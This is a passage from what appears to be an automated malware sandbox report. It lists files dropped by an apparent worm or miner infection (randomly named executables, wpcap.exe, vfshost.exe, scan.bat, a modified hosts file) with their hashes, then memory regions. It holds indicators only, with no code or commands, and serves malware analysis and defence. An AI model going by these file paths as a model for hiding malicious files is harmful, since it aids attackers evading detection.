                                                                                                                                                          fef9c7fcb111bd34e9873aedc6491605b0033bcec1c0a3a7f9cf9a9e97a512e9

                                                                                                                                                          SHA512

                                                                                                                                                          78cdb29d0d0e70141f3580e36c4143eb0477a6d6abb89565edb061c7b867ec27694cf6d760b26dcdf215bb93245e8d228ead603a6979d1c750ae828561401628

                                                                                                                                                        • C:\Windows\TEMP\uifypdhej\1224.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.4MB

                                                                                                                                                          MD5

                                                                                                                                                          79776a96db6f3d3af9eccdec1e65ae4e

                                                                                                                                                          SHA1

                                                                                                                                                          0589a7cbc31bb69267a65506dfe61b1628da23b6

                                                                                                                                                          SHA256

                                                                                                                                                          9b103139f17deec6fb2fb851b37dccc14c099464c86c9bdf0bb7e9bd05ecead3

                                                                                                                                                          SHA512

                                                                                                                                                          474817700f6f3dd87e44b9eb28ea89e8e6cbf487e4b321e5b7683d61c20abb65a488ca734e5c7d684593848e5a2da49da9992f6f355dc99bffa10b47faeda5c1

                                                                                                                                                        • C:\Windows\TEMP\uifypdhej\1316.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.3MB

                                                                                                                                                          MD5

                                                                                                                                                          e1a30eaa5b2d421662e450c315840b2b

                                                                                                                                                          SHA1

                                                                                                                                                          ebbcca65c9811ac670b97b2f7d942b096734dc2f

                                                                                                                                                          SHA256

                                                                                                                                                          be70fd1a320cdf64768b78e446620566be79cff13603897d74573535be3c06d6

                                                                                                                                                          SHA512

                                                                                                                                                          6da676fb2aeea7af1712c8d622746fe13f000b314cfb4709d2b1f2c181709a63d3312a7e8a646cf86cc992543625236a02728369df3a6f10e61640c132bd6408

                                                                                                                                                        • C:\Windows\TEMP\uifypdhej\1992.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          6.9MB

                                                                                                                                                          MD5

                                                                                                                                                          daf7440c9c8abcaeb8cd8cb4cf21df43

                                                                                                                                                          SHA1

                                                                                                                                                          10a9ced4f3569215b9c27f7787ca9bc2b50cf18f

                                                                                                                                                          SHA256

                                                                                                                                                          f4a8e4d71d1b1b79983a403735445db02d03da8e74fcb1aa6a8fff26f3ffdd9e

                                                                                                                                                          SHA512

                                                                                                                                                          dda64705d0a4ded8f674e1e420fe526ea80d47e4a0c2f91b2d7573121fe20a3336822ee7c68d6459c3aee49f4b0ce27ba634bcc37bccd1a07c29108c9161ad04

                                                                                                                                                        • C:\Windows\TEMP\uifypdhej\2596.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          2.0MB

                                                                                                                                                          MD5

                                                                                                                                                          67977c5c5c852743c2881e85a4a7a154

                                                                                                                                                          SHA1

                                                                                                                                                          8773f823c838d8f984d11655ab6dc6400b0917a0

                                                                                                                                                          SHA256

                                                                                                                                                          012402743bddd6e7c622ea31589f7073d9a63f829d1457d10b486c428ca7a385

                                                                                                                                                          SHA512

                                                                                                                                                          55628ba0047ffe1d0a6dea2f400d81ea1a21825680874acfbc93597da3325cedbf5c34036990bf32134f293d0cc51cb37a895a27f271554197d8703191ea6b98

                                                                                                                                                        • C:\Windows\system32\drivers\etc\hosts

                                                                                                                                                          Filesize

                                                                                                                                                          975B

                                                                                                                                                          MD5

                                                                                                                                                          b5d815ff5310f62de5020591be598bc0

                                                                                                                                                          SHA1

                                                                                                                                                          8013562b0cc2516d16d474308c8982a31b7f5dd0

                                                                                                                                                          SHA256

                                                                                                                                                          a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

                                                                                                                                                          SHA512

                                                                                                                                                          4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

                                                                                                                                                        • C:\Windows\uifypdhej\yffpneitq\fqbserpdq.exe

                                                                                                                                                          Filesize

                                                                                                                                                          63KB

                                                                                                                                                          MD5

                                                                                                                                                          821ea58e3e9b6539ff0affd40e59f962

                                                                                                                                                          SHA1

                                                                                                                                                          635a301d847f3a2e85f21f7ee12add7692873569

                                                                                                                                                          SHA256

                                                                                                                                                          a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

                                                                                                                                                          SHA512

                                                                                                                                                          0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

                                                                                                                                                        • C:\Windows\uifypdhej\yffpneitq\ip.txt

                                                                                                                                                          Filesize

                                                                                                                                                          183B

                                                                                                                                                          MD5

                                                                                                                                                          43faeaf6f9ac7eca998c9be46776bebe

                                                                                                                                                          SHA1

                                                                                                                                                          d2a93eaed1a6ec1df9a8f204f8b0592a7be9702a

                                                                                                                                                          SHA256

                                                                                                                                                          ffd3b6a937fb0fe74f4bec269a10c0d5046174822659c45d6846b62c62a4d1c2

                                                                                                                                                          SHA512

                                                                                                                                                          2b79f2cf52a61003b484a788cfdee7933a6912b6059a50e2fc9f6c7ba201da30c7f680b9c9c329b3b59b8e807bfb0cffa6de0ea9585094ef7c065958d4ae8992

                                                                                                                                                        • C:\Windows\uifypdhej\yffpneitq\scan.bat

                                                                                                                                                          Filesize

                                                                                                                                                          159B

                                                                                                                                                          MD5

                                                                                                                                                          45407707870a6910f4ef433f0c667e2c

                                                                                                                                                          SHA1

                                                                                                                                                          e14e944169023119d471c1f931b4980bbc9e2715

                                                                                                                                                          SHA256

                                                                                                                                                          80663e998e6e9e362d39b3fcb8a096991b1d210f1c11a3325036324324d24f7d

                                                                                                                                                          SHA512

                                                                                                                                                          91322f36e9b14b041cd08b15d1c1505a3b37f5521bd8caf504fb147bd294297756f01a5b8269bb5bc11a5b01712e945ff26b634019c73c5e6419c9be761e3b28

                                                                                                                                                        • \Windows\Temp\nsyED2E.tmp\System.dll

                                                                                                                                                          Filesize

                                                                                                                                                          11KB

                                                                                                                                                          MD5

                                                                                                                                                          2ae993a2ffec0c137eb51c8832691bcb

                                                                                                                                                          SHA1

                                                                                                                                                          98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                                                                                                          SHA256

                                                                                                                                                          681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                                                                                                          SHA512

                                                                                                                                                          2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                                                                                                        • \Windows\Temp\nsyED2E.tmp\nsExec.dll

                                                                                                                                                          Filesize

                                                                                                                                                          6KB

                                                                                                                                                          MD5

                                                                                                                                                          b648c78981c02c434d6a04d4422a6198

                                                                                                                                                          SHA1

                                                                                                                                                          74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                                                                                                          SHA256

                                                                                                                                                          3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                                                                                                          SHA512

                                                                                                                                                          219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                                                                                                        • \Windows\Temp\qvzqhemke\feezub.exe

                                                                                                                                                          Filesize

                                                                                                                                                          343KB

                                                                                                                                                          MD5

                                                                                                                                                          2b4ac7b362261cb3f6f9583751708064

                                                                                                                                                          SHA1

                                                                                                                                                          b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                                                                                                          SHA256

                                                                                                                                                          a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                                                                                                          SHA512

                                                                                                                                                          c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                                                                                                                        • \Windows\Temp\uifypdhej\cfqmyyevt.exe

                                                                                                                                                          Filesize

                                                                                                                                                          126KB

                                                                                                                                                          MD5

                                                                                                                                                          e8d45731654929413d79b3818d6a5011

                                                                                                                                                          SHA1

                                                                                                                                                          23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                                                                                                          SHA256

                                                                                                                                                          a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                                                                                                          SHA512

                                                                                                                                                          df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                                                                                                        • \Windows\Temp\xohudmc.exe

                                                                                                                                                          Filesize

                                                                                                                                                          72KB

                                                                                                                                                          MD5

                                                                                                                                                          cbefa7108d0cf4186cdf3a82d6db80cd

                                                                                                                                                          SHA1

                                                                                                                                                          73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                                                                                                          SHA256

                                                                                                                                                          7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                                                                                                          SHA512

                                                                                                                                                          b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                                                                                                                        • \Windows\pbhldrte\lbktbat.exe

                                                                                                                                                          Filesize

                                                                                                                                                          7.8MB

                                                                                                                                                          MD5

                                                                                                                                                          d77f18c2dbdc735c5cd59e6a58d3aadd

                                                                                                                                                          SHA1

                                                                                                                                                          8953d5c2970f0fd77678ba3a73beb0af57d81a89

                                                                                                                                                          SHA256

                                                                                                                                                          66bf70cc26425aac2ea7ad00a7bc260558785e282687282c389ad2967ffcf158

                                                                                                                                                          SHA512

                                                                                                                                                          78cfb7000d12f54c9511734117f95ffe093399545761f91f6b60eb123a78f3f8111652c48f533a99cc1363a0539de131c6ebd5313756c7d4e64f61e4f983dbf7

                                                                                                                                                        • \Windows\uifypdhej\Corporate\vfshost.exe

                                                                                                                                                          Filesize

                                                                                                                                                          381KB

                                                                                                                                                          MD5

                                                                                                                                                          fd5efccde59e94eec8bb2735aa577b2b

                                                                                                                                                          SHA1

                                                                                                                                                          51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                                                                                                          SHA256

                                                                                                                                                          441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                                                                                                          SHA512

                                                                                                                                                          74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                                                                                                        • \Windows\uifypdhej\yffpneitq\ebbdzzetb.exe

                                                                                                                                                          Filesize

                                                                                                                                                          332KB

                                                                                                                                                          MD5

                                                                                                                                                          ea774c81fe7b5d9708caa278cf3f3c68

                                                                                                                                                          SHA1

                                                                                                                                                          fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                                                                                                          SHA256

                                                                                                                                                          4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                                                                                                          SHA512

                                                                                                                                                          7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                                                                                                        • \Windows\uifypdhej\yffpneitq\wpcap.exe

                                                                                                                                                          Filesize

                                                                                                                                                          424KB

                                                                                                                                                          MD5

                                                                                                                                                          e9c001647c67e12666f27f9984778ad6

                                                                                                                                                          SHA1

                                                                                                                                                          51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                                                                                                          SHA256

                                                                                                                                                          7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                                                                                                          SHA512

                                                                                                                                                          56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                                                                                                        • memory/768-178-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          72KB

                                                                                                                                                        • memory/768-164-0x0000000010000000-0x0000000010008000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          32KB

                                                                                                                                                        • memory/1052-135-0x0000000000550000-0x000000000063E000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          952KB

                                                                                                                                                        • memory/1052-134-0x0000000000550000-0x000000000063E000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          952KB

                                                                                                                                                        • memory/1128-212-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-240-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-151-0x0000000000110000-0x0000000000120000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                        • memory/1128-299-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-220-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-149-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-219-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-214-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-206-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-236-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-238-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-189-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1128-289-0x000000013FB80000-0x000000013FCA0000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/1512-136-0x000000013FB00000-0x000000013FBEE000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          952KB

                                                                                                                                                        • memory/1512-138-0x000000013FB00000-0x000000013FBEE000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          952KB

                                                                                                                                                        • memory/1560-177-0x000000013FD10000-0x000000013FD6B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/1560-180-0x000000013FD10000-0x000000013FD6B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/1956-235-0x0000000000CD0000-0x0000000000CE2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          72KB

                                                                                                                                                        • memory/2096-233-0x0000000000CD0000-0x0000000000CE2000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          72KB

                                                                                                                                                        • memory/2256-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          6.6MB

                                                                                                                                                        • memory/2256-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          6.6MB

                                                                                                                                                        • memory/2344-185-0x000000013F8E0000-0x000000013F93B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2344-187-0x000000013F8E0000-0x000000013F93B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2356-154-0x000000013FAE0000-0x000000013FB3B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2356-144-0x000000013FAE0000-0x000000013FB3B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2416-197-0x000000013FD20000-0x000000013FD7B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2416-194-0x000000013FD20000-0x000000013FD7B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2428-209-0x000000013F740000-0x000000013F79B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2428-204-0x000000013F740000-0x000000013F79B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2568-143-0x0000000002920000-0x000000000297B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2568-213-0x0000000001A40000-0x0000000001A9B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2568-211-0x0000000002920000-0x000000000297B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2568-205-0x0000000002A50000-0x0000000002B70000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/2568-203-0x0000000002960000-0x00000000029BB000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2568-202-0x0000000002920000-0x000000000297B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2568-192-0x0000000001A40000-0x0000000001A9B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          364KB

                                                                                                                                                        • memory/2568-148-0x0000000002A50000-0x0000000002B70000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/2572-9-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          6.6MB

                                                                                                                                                        • memory/2960-75-0x00000000001B0000-0x00000000001FC000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          304KB